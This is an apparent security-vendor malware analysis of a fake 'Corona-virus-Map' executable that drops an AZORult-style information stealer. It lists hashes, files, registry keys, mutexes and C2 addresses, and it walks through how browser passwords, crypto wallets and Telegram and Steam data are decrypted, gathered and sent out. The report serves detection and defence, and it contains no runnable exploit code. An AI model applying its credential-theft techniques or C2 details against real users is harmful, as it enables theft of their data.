COVID-19, Info Stealer & the Map of Threats; Threat Analysis Report

logo
Featured On

NewsweekForbesBuisiness InsiderAxios
This article contains
arrow

Executive Summary

As global awareness of the COVID pandemic gradually gives way to full out panic, and as governments begin ramping up their efforts to combat the virus and protect its citizens, global news agencies find themselves racing to answer the public’s demand for accurate info about new COVID related infections, deaths, transmissions, etc.

This demand creates a vulnerability that malicious actors have quickly taken advantage of by spreading malware disguised as a “Coronavirus map”. ReasonLabs researcher Shai Alfasi found new malware that had weaponized coronavirus map applications to steal credentials such as user names, passwords, credit card numbers and other sensitive information that is stored in the users’ browser. Attackers can use this information for many other operations as well, such as selling it on the deep web or for gaining access to bank accounts or social media.

The new malware activates a strain of malicious software known as AZORult. AZORult is an information stealer and was first discovered in 2016. It is used to steal browsing history, cookies, ID/passwords, cryptocurrency and more. It can also download additional malware onto infected machines. AZORult is commonly sold on Russian underground forums for the purpose of collecting sensitive data from an infected computer. There is also a variant of the AZORult that creates a new, hidden administrator account on the infected machine in order to allow Remote Desktop Protocol (RDP) connections. As the coronavirus continues to spread and more apps and technologies are developed to monitor it, we will likely be seeing an increase in corona malware and corona malware variants well into the foreseeable future.

Sample Analyzed

VirusTotal

  • File Name Corona-virus-Map.com.exe
  • MD5 73da2c02c6f8bfd4662dc84820dcd983
  • SHA-1 949b69bf87515ad8945ce9a79f68f8b788c0ae39
  • SHA-256 2b35aa9c70ef66197abfb9bc409952897f9f70818633ab43da85b3825b256307
  • File Size 3.26 MB (3421696 bytes)
  • File Type Win32 EXE
  • First Submission  2020-03-02 16:50:25

The malware has a GUI that looks very good and convincing. When running the malware, the GUI window loads information, which pools from the web.

ק.png

The malware uses a few layers of packing as well as a multi-sub-process technique to make research more difficult. The malware also uses an information-stealing technique, which was first seen in 2016 and related to the “AZORult” malware family. To make sure the malware can persist and keep operating, it uses the “Task Scheduler”.

Indicators of Compromise: 

Created files:

Corona-virus-Map.com.exe
  • C:\Users\%username%\AppData\Local\Temp\aut9BDA.tmp
  • C:\Users\%username%\AppData\Roaming\Z11062600\Corona[.]exe
  • C:\Users\%username%\AppData\Local\Temp\aut9DFE.tmp
  • C:\Users\%username%\AppData\Roaming\Z11062600\Corona-virus-Map.com[.]exe
Corona.exe
  • C:\Users\%username%\AppData\Local\Temp\RarSFX0\Corona[.]bat
  • C:\Users\%username%\AppData\Local\Temp\RarSFX0\Corona.sfx[.]exe
  • C:\Users\%username%\AppData\Local\Temp\autA83E.tmp
  • C:\Users\%username%\AppData\Roaming\Z58538177\bin[.]exe
  • C:\Users\%username%\AppData\Local\Temp\autAAB0.tmp
  • C:\Users\%username%\AppData\Roaming\Z58538177\Build[.]exe
Bin.exe
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll            
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll            
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll            
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dl            
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dl            
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-c
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll           
  • C:\Users\%username%\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\freebl3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\mozglue.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\msvcp140.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\nss3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\nssdbm3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\softokn3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\ucrtbase.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\vcruntime140.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\nss3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\nss3.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\mozglue.dll
  • C:\Users\%username%\AppData\Local\Temp\2fda\vcruntime140.dll
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983
Windows.Globalization.Fontgroups.exe
  • C:\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D
  • C:\Users\%username%\AppData\Local\Temp\autB628.tmp
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\Windows.Globalization.Fontgroups.sqlite3.module.dll.2
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\Windows.Globalization.Fontgroups.sqlite3.module.dll
  • C:\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
  • C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\2KY2PE8H\getMe[1].json
  • C:\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_74167E25E5476CCA2A5946AAA61BF9E1
  • C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\1OZ94YX5\json[1].json
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\1\Information.txt
  • C:\Users\%username%\AppData\Local\Temp\autCC51.tmp
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\Windows.Globalization.Fontgroups.module.exe.2
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\Windows.Globalization.Fontgroups.module.exe
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z
  • C:\Users\%username%\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z

Modified registers

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntrane
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix  
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
  • HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-3887374624-1885671809-3229943349-1001\\Device\HarddiskVoume4\Windows\SysWOW64\cmd.exe
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475
  • HKCU\Software\Classes\Local Settings\MuiCache\56\52C64B7E\LanguageList
  • HKCU\Software\Classes\Local Settings\MuiCache\56\52C64B7E\LanguageList
  • HKCU\Software\Classes\Local Settings\MuiCache\56\52C64B7E\LanguageList
  • HKCU\Software\Classes\Local Settings\MuiCache\56\52C64B7E\LanguageList

Mutexes Created:

  • \Sessions\1\BaseNamedObjects\A4B6CE24-E72D679B-BE9A182F-D7CE305A-FB62BB342
  • \Sessions\1\BaseNamedObjects\IESQMMUTEX_0_208
  • \Sessions\1\BaseNamedObjects\417087542ENU_FE97A6DDE921C7562535
  • \Sessions\1\BaseNamedObjects\MSIMGSIZECacheMutex
  • \Sessions\1\BaseNamedObjects\GdiplusFontCacheFileV1
  • \Sessions\1\BaseNamedObjects\Global\CPFATE_2304_v4.0.30319
  • \Sessions\1\BaseNamedObjects\Local\c:!users!user!appdata!roaming!microsoft!windows!ietldcache!
  • \Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_LOW!_
  • \Sessions\1\BaseNamedObjects\Local\c:!users!user!appdata!local!microsoft!windows!temporary internet files!low!content.ie5!
  • \Sessions\1\BaseNamedObjects\Local\c:!users!user!appdata!roaming!microsoft!windows!cookies!low!
  • \Sessions\1\BaseNamedObjects\Local\c:!users!user!appdata!local!microsoft!windows!history!low!history.ie5!
  • \Sessions\1\BaseNamedObjects\A4B6CE24-E72D679B-BE9A182F-DACC8B0F-7324685F3
  • \Sessions\1\BaseNamedObjects\417087542ENU_687FE9797AC054582535
  • \Sessions\1\BaseNamedObjects\Global\CPFATE_1308_v4.0.30319

Network communication

Process

Ip Address

Url

Bin.exe

104.24.103.192:80

Coronavirusstatus[.]space/index.php

Windows.Globalization.Fontgroups.exe

149.154.167.220:443

api.telegram.org

Windows.Globalization.Fontgroups.exe

104.26.9.44:443

ipapi.co/json

Windows.Globalization.Fontgroups.exe

93.184.220.29:80

ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA%2Fz5hY5qj0aEmX0H4s05bY%3D

Corona-virus-Map.com.exe

18.205.183.153:443

gisanddata.maps.arcgis[.]com

Corona-virus-Map.com.exe

54.192.87.49:443

https://js.arcgis.com/3.31/dijit/form/_ListBase[.]js

Corona-virus-Map.com.exe

54.192.87.49:443

https://js.arcgis.com/3.31/dijit/form/MappedTextBox[.]js

Execution Flow Summary

ExecFlow.png

NOTE: js.arcgis.com is safe to visit.

Full analysis

After receiving the sample, I started first with dynamic analysis, executed the file “CoronaMap.exe”[PID 4280] and opened up a window that showed the following “CoronaVirus” statistics:

ק.png

Running procmon at the same time revealed a multi-sub process that was created by  “CoronaMap.exe”[PID 4280]  which is the root process.

4.png

“CoronaMap.exe”[PID 4280] starts by creating another binary called “Corona.exe”[PID 7032]. When analyzing this file, it was easy to see that it was an archive, which means that it probably contains execution commands that can execute it.

Simply by using Winrar to view the archive content, I found two files inside it and they were in self-extracted mode (SFX). The two files were “Corona.bat” and “Corona.sfx.exe”, which we can also see in the process tree in procmon. Upon opening the “Corona.bat” file, we could see that “Corona.sfx.exe” was extracted with a hardcoded password (3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r) to the “C:\windows\system32” directory:

6.png

The “Corona.sfx.exe”[PID 3552] is an extracting process called “Corona.exe”[PID 9452]. This process creates more processes, but we will be focusing on only three of them: “bin.exe”[PID 8604], “timeout.exe”[PID 5680] And “Build.exe”[PID 6348]

As I started to analyze the“bin.exe”[PID 8604] with Ollydbg, I was able to see that it was writing some Dll’s, one of which was known to me from different actors: the “nss3.dll” :

7.png

8.png

Going deeper inside with Ollydbg, I saw static loading of APIs related to “nss3.dll”. The code utilized the API functions within the “nss3.dll” to decrypt saved passwords and create output data.

9.png

This technique is pretty common. I came across it once before, and after doing some digging around, discovered that this information-stealing tactic came from a malware family called “AZORult”, which was first seen in the wild in 2016. Its behavior is as follows: When the victim gets infected, the malware extracts data and creates a unique ID of the victim’s workstation. It then applies XOR encryption using the generated ID. This ID is used to tag the workstation in order to start C2 communication. The C2 server responds with configuration data, which contains target web browser names, web browser path information, API names, sqlite3 queries, and legitimate DLLs.

Using Ollydbg and keeping a trace on the API calls from the loaded “nss3.dll”, I was able to see the following calls:

  • Sqlite3_open
  • Sqlite3_close
  • Sqlite3_prepare_v2
  • Sqlite3_step
  • Sqlite3_column_text
  • Sqlite3_column_bytes
  • Sqlite3_finalize
  • NSS_Init
  • PK11_GetInternalKeySlot
  • PK11_Authenticate
  • PK11SDR_Decrypt
  • NSS_Shutdown
  • PK11_FreeSlot 

The password-stealing operation process is simple because the malware steals the “login data” from the installed browser and moves it to “C:\Windows\Temp”. The “login data” is based on Sqlite3 DB structure. To read the date the malware queries the SQLite data in order to extract the information. Once the extraction is over, the malware creates a file called “PasswordList.txt”, which holds all the information.

13.png

13.1.png

As I kept on digging in the code of “bin.exe”[PID 8604], I could see that the malware is also looking for different cryptocurrency wallets such as “Electrum” and “Ethereum”:

13.2.png

Also looking for “Telegram Desktop”:

13.3.png

Searches for “Steam” account:

13.4.png13.4.png

Takes a screenshot and saves it as “scr.jpg”:

14.png

Resolve the public IP address of the victim machine and save it as “ip.txt”:

1.png

2.png

Collecting information about the system such as the OS system, the architecture, the hostname, the username, etc:

14.3.png

As I continued with “bin.exe”[PID 8604], I found that the malware communicates with its C2 server using the address of 104.24.103.192:80, which we can resolve to http://coronavirusstatus[.]space/. By analyzing the traffic, I found that the “bin.exe”[PID 8604] uses “chunked” transfer encoding, which is also something we see in the wild. When the Content-Length value is smaller than the chunked payload size, the origin server will check the Content-Length header to determine the length of the request, but there will be some leftover payload that will be concatenated to the next incoming request. This is how the malware sends out the information it steals:

14.4.png

14.5.png

Moving on to the “timeout.exe”[PID 5680], it was easy to understand that the malware author used it in order to create a delay execution. This is also a pretty common technique that is used to trick AVs. As I started analyzing the “Build.exe”[PID 6348], I could see a “Loadlibrary” of “taskschd.dll”, which I was already familiar with this in case of persistence:

15.png

The “Build.exe”[PID 6348] creates a subprocess “Windows.Globalization.Fontgroups.exe”[PID 3848] which the persistence runs.

When analyzing the “Windows.Globalization.Fontgroups.exe”[PID 3848],  I could see that it was packed with UPX, which is pretty easy to unpack.

17.png

After unpacking, I noticed that there was another layer of packing. This time, it was with AutoIT. Moving forward with the analysis, I found that this binary is responsible for enumerating the OS in order to find new browsers and resources that it can steal information from:

18.png

The “Windows.Globalization.Fontgroups.exe”[PID 3848]  creates a process called “Windows.Globalization.Fontgroups.module.exe”[PID 3848]  which is responsible for creating the zip file with all the information “bin.exe”[PID 8604] sends out:

C:\Users\shy32\AppData\Roaming\amd64_netfx4-system.runti..dowsruntime.ui.xaml\ENU_64B5614D0F4B35423983.7z

The “Windows.Globalization.Fontgroups.exe”[PID 3848] uses “Attrib.exe”[PID 8832] in order to hide this directory:

19.png

Remediation 

  • Download RAV Endepoint Protection. 
  • Doubleclick on the installed executable and follow the prompts to complete the installation.
  • Once the installation is complete, click ‘Finish’.
  • Definitions and security patches will automatically be updated.
  • Once the process is complete, select the ‘Scan Now’ button to start your scan.
  • When the scan is finished, select all the threats that were detected and then click on ‘Remove selected threats’.
  • When prompted, restart your computer.

MetaData

hashes

  • 2b35aa9c70ef66197abfb9bc409952897f9f70818633ab43da85b3825b256307
  • 0b3e7faa3ad28853bb2b2ef188b310a67663a96544076cd71c32ac088f9af74d
  • 13c0165703482dd521e1c1185838a6a12ed5e980e7951a130444cf2feed1102e
  • Fda64c0ac9be3d10c28035d12ac0f63d85bb0733e78fe634a51474c83d0a0df8
  • 126569286f8a4caeeaba372c0bdba93a9b0639beaad9c250b8223f8ecc1e8040
  • 203c7e843936469ecf0f5dec989d690b0c770f803e46062ad0a9885a1105a2b8

Note

***The original Johns Hopkins University or ArcGIS coronavirus map hosted online is not infected or backdoored in any way and are safe to visit.